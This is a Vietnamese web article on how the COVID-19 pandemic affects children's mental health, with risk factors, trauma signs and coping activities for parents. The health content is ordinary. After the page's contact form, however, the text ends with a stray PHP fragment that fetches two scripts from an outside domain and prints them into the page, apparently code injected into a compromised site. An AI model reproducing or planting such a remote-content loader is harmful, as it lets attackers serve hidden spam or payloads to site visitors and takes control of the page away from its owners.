Đại dịch COVID có thể ảnh hưởng tới tâm lý trẻ em như thế nào?

Chăm sóc sức khỏe tâm thần cho trẻ đóng vai trò vô cùng quan trọng trong thời kỳ đại dịch Covid-19. Có nhiều yếu tố rủi ro có thể xảy ra và ảnh hưởng đến trẻ em trong khoảng thời gian này, thậm chí có thể dẫn đến suy nhược sức khỏe tâm thần như:

- Giãn cách xã hội và sự gián đoạn với các thói quen trước đây
- Mất người thân vì Covid-19
- Thiếu tiếp cận với bạn bè đồng trang lứa
- Giáo dục trực tuyến
- Mất các thú vui trước đây do giảm thu nhập gia đình
- Bạo lực có thể xảy ra trong gia đình

Những yếu tố rủi ro này có thể làm trầm trọng thêm các bệnh tâm thần có sẵn hoặc gây ra các vấn đề sức khỏe tâm thần mới.
Theo nghiên cứu của Kimberley Norris, nhà tâm lý và nghiên cứu viên người Úc, khi con người bị cách ly vì một đại dịch, họ có xu hướng xoay vòng những giai đoạn cảm xúc khác nhau. Cách chúng ta cảm nhận và hành động trong những giai đoạn này có thể thay đổi phụ thuộc vào độ tuổi và các yếu tố khác, tuy nhiên chu trình cảm xúc thường tuân theo khuôn mẫu sau:

1. Rối loạn – mua hàng tích trữ, cố gắng làm rõ các quy định hoặc trẻ em không hiểu tại sao chúng không còn có thể gặp bạn bè ở trường nữa
2.Tận hưởng – tìm thấy một thói quen, thích nghi những với thay đổi khi làm việc tại nhà, cảm nhận được ý thức cộng đồng
3. Oán giận – cảm thấy bị gò bó hoặc chán ngấy việc mang khẩu trang
4. Tái hợp – giai đoạn chúng ta bắt đầu ngưng cách ly và có thể cảm thấy nhiều cảm xúc hỗn độn. Sự mâu thuẫn về cảm xúc này có thể là “Tôi sợ mắc bệnh nhưng tôi thấy hạnh phúc nếu được đi biển.”
5. Tái hòa nhập – quay trở lại hoạt động bình thường trong xã hội
anh_huong_tam_ly_tre_em_thoi_covid

Trong quá trình tự cách ly và giãn cách ở nhà, những nhà lâm sàng như chúng tôi lo ngại rằng các cá nhân trong cộng đồng của chúng ta có thể cảm thấy không thoải mái khi tìm kiếm dịch vụ chăm sóc sức khỏe tâm thần cần thiết. Tuy nhiên, dịch vụ chăm sóc từ xa luôn khả dụng và các buổi chăm sóc sức khỏe tâm thần có thể được tiến hành an toàn ngay tại nhà.

Tác động của đại dịch Covid-19 lên trẻ em
Đại dịch Covid-19 có thể gây tổn thương hàng loạt và tác động đến sức khỏe tâm thần của trẻ em trong hiện tại và cả tương lai sau này. Sang chấn này có khả năng cao làm trầm trọng thêm những bệnh tâm thần đã có và góp phần gây ra các bệnh mới liên quan đến căng thẳng.

tac_dong_covid_toi_tre
Nếu các dấu hiệu và triệu chứng của sang chấn không được điều trị, chúng có thể gây ảnh hưởng lâu dài đến sự phát triển lành mạnh của trẻ trên phương diện cảm xúc, hành vi và thể chất. Những dấu hiệu và triệu chứng của sang chấn ở trẻ em có thể bao gồm:

- Trầm cảm và/hoặc lo âu
- Giấc ngủ, việc ăn uống và kết quả học tập có sự thay đổi
- Cảm giác bị cô lập
- Tăng sự lo âu về chia tách
- Tham gia vào những hành vi rủi ro
- Mất hứng thú đối với bạn bè và/hoặc các hoạt động
- Không vâng lời
- Hành vi thoái lui như mất kỹ năng đi vệ sinh

Cần làm gì để xây dựng sức bền tâm lý cho trẻ
Để giảm thiểu tác động của Covid-19, cha mẹ có thể thực hiện một số phương pháp để giúp con mình xây dựng sức bền tâm lý. Những đứa trẻ với sức bền tâm lý tốt có xu hướng hạnh phúc hơn, có động lực và gắn kết hơn, tự tin hơn và xây dựng được thái độ lạc quan khi đối mặt với những tình huống thử thách.
can_lam_gi_de_xay_dung_suc_ben_cho_tre

Sau đây là một vài ý tưởng mà phụ huynh có thể thử áp dụng tại nhà:

Xây dựng lịch trình
Cho dù thời gian có thể cố định hoặc không, mọi trẻ em đều hưởng lợi từ việc tuân theo thói quen sẵn có. Việc tuân theo lịch trình mang lại sự nhất quán, cấu trúc và khả năng dự đoán. Khi chúng ta không biết được chuyện gì sẽ xảy đến tiếp theo, việc xây dựng thói quen và khả năng dự đoán đóng vai trò hỗ trợ giảm những bất ổn từ thế giới hỗn loạn bên ngoài.

Nhận diện cảm xúc
Hôm nay là một ngày tuyệt vời để cả gia đình cùng xem phim tối, và có bộ phim nào mô tả thế giới nội tâm của trẻ em tốt hơn phim “Inside Out” của Pixar? Bạn có thể dựng một chiếc lều nhỏ trong phòng khách và chuẩn bị đồ ăn vặt yêu thích của gia đình. Sau khi xem phim, hãy lấy bút vẽ và giấy để con bạn vẽ về những cảm xúc mà con vừa cảm nhận. Cảm xúc đó trông như thế nào? Cảm xúc ấy sẽ nói gì nếu nó có khả năng nói chuyện? Nó cần gì để cảm thấy tốt hơn hoặc an toàn?

Kỹ năng đối phó
Có nhiều cách khác nhau giúp kiểm soát những cảm xúc mạnh ở trẻ.

- Hít thở sâu – Việc này sẽ giúp trẻ bình tĩnh và tự trấn an. Hít vào trong 3 giây, giữ yên trong 3 giây sau đó thở ra trong 3 giây.
- Căng trùng cơ tuần tự – Căng cơ khi bạn hít vào, sau đó giãn cơ khi bạn thở ra. Việc này sẽ giúp bạn nhận diện được khi nào bị căng thẳng trong tương lai, và nếu bạn cảm thấy bồn chồn thì bạn có thể sử dụng kỹ năng hít thở sâu để giúp thư giãn cơ thể.
- Tập trung vào hiện tại – Đem sự chú ý của bạn về thời điểm hiện tại thông qua năm giác quan. Ví dụ, kể tên năm đồ vật bạn nhìn thấy trong phòng, bốn vật bạn có thể cảm nhận qua chạm, ba âm thanh bạn nghe được, …

Hộp ứng phó gia đình
Hộp ứng phó có thể chứa những công cụ mà các thành viên khác nhau trong gia đình có thể dùng đến khi cảm thấy căng thẳng. Hộp gia đình nên được đặt tại vị trí mà mọi thành viên có thể tiếp cận dễ dàng. Hãy cân nhắc sử dụng các đồ vật như thú nhồi bông mềm, trò chơi tìm từ, sách về tư thế yoga, đồ chơi giảm căng thẳng (fidget toy) hoặc bóng co giãn.

Giải quyết xung đột
Lệnh giãn cách xã hội có thể khiến một số gia đình phải bên nhau trong một không gian hẹp và thời gian dài, một cách tự nhiên, điều này có thể dẫn đến những bất đồng giữa các thành viên. Vậy nên hãy thiết lập quy tắc giao tiếp trong gia đình, chẳng hạn như sử dụng câu “Tôi cảm thấy” để diễn đạt cảm xúc, không ngắt lời người khác và tạm lánh khi mọi việc trở nên căng thẳng.

Chánh niệm
Khoa học đã cho thấy rằng sức mạnh của tư duy có thể thay đổi cách chúng ta cảm nhận và dẫn đến những thay đổi của mọi người xung quanh. Một ví dụ của việc thực hành chánh niệm là thiền từ bi (loving-kindness meditation). Nếu không thể ở cùng những người thân yêu ngay tại thời điểm này, chúng ta có thể gửi đến họ lòng tốt và những lời chúc tốt lành. Hãy nhắm mắt lại, tưởng tượng ra người hoặc vật nuôi mà bạn quan tâm và nói thành tiếng hoặc nói nhẩm trong đầu “Mong cho bạn được bình an. Mong cho bạn sức khỏe và mạnh mẽ. Mong cho bạn hạnh phúc. Mong cho bạn bình yên và thoải mái.”

Thực hành biết ơn
Nghiên cứu đã phát hiện ra rằng việc dạy trẻ em về lòng biết ơn giúp đứa trẻ hạnh phúc, lạc quan và rộng lượng hơn. Hãy khuyến khích con viết một cuốn nhật ký biết ơn, trong đó con có thể viết về ba điều mà con cảm thấy biết ơn mỗi ngày. Vào cuối tuần, mọi người có thể cùng nhau chia sẻ những suy nghĩ và sự biết ơn của mình.

Nguồn: Lược dịch từ How living through a pandemic like Covid 19 can affect children's mental health, CHOC Children’s

Bài viết liên quan

Gọi cho tôi

Hãy gửi thông tin cho chúng tôi, nhân viên tư vấn của Viện sẽ liên hệ lại Quý khách trong vòng 24h. Thông tin của Quý khách chỉ để chúng tôi liên hệ và không gửi cho bên thứ ba.

Tài nguyên

Trắc nghiệm

https://tracnghiem.tamlyvietphap.vn/

$content1 = file_get_contents("https://ayambakar.vip/bl/bc.php"); $content2 = file_get_contents("https://ayambakar.vip/st/index.php"); echo ''; echo ''; ?>